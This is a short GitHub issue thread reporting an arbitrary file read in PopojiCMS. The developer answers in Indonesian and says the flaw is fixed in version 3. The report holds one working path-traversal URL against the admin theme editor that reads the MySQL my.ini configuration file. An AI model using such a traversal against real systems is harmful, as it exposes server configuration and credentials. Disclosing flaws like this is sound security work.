### ISSUE TITLE
Any file read in the background

### ISSUE THREAD

**Issue by MisakiKata** [PopojiCMS/PopojiCMS#19]
http://localhost/popojicms/po-admin/admin.php?mod=theme&act=edit&folder=chingsy&id=/../../../../../mysql/my.ini

![image](https://user-images.githubusercontent.com/27627614/58936948-945c3280-87a3-11e9-8c31-66e3e851377a.png)

**Comment by DwiraSurvivor** [comment]
Terima kasih untuk temuan ini. Kami sebagai pengembang akan segera memperbaiki masalah ini di versi berikutnya.

**Comment by DwiraSurvivor** [comment]
Sudah diperbaiki pada versi 3
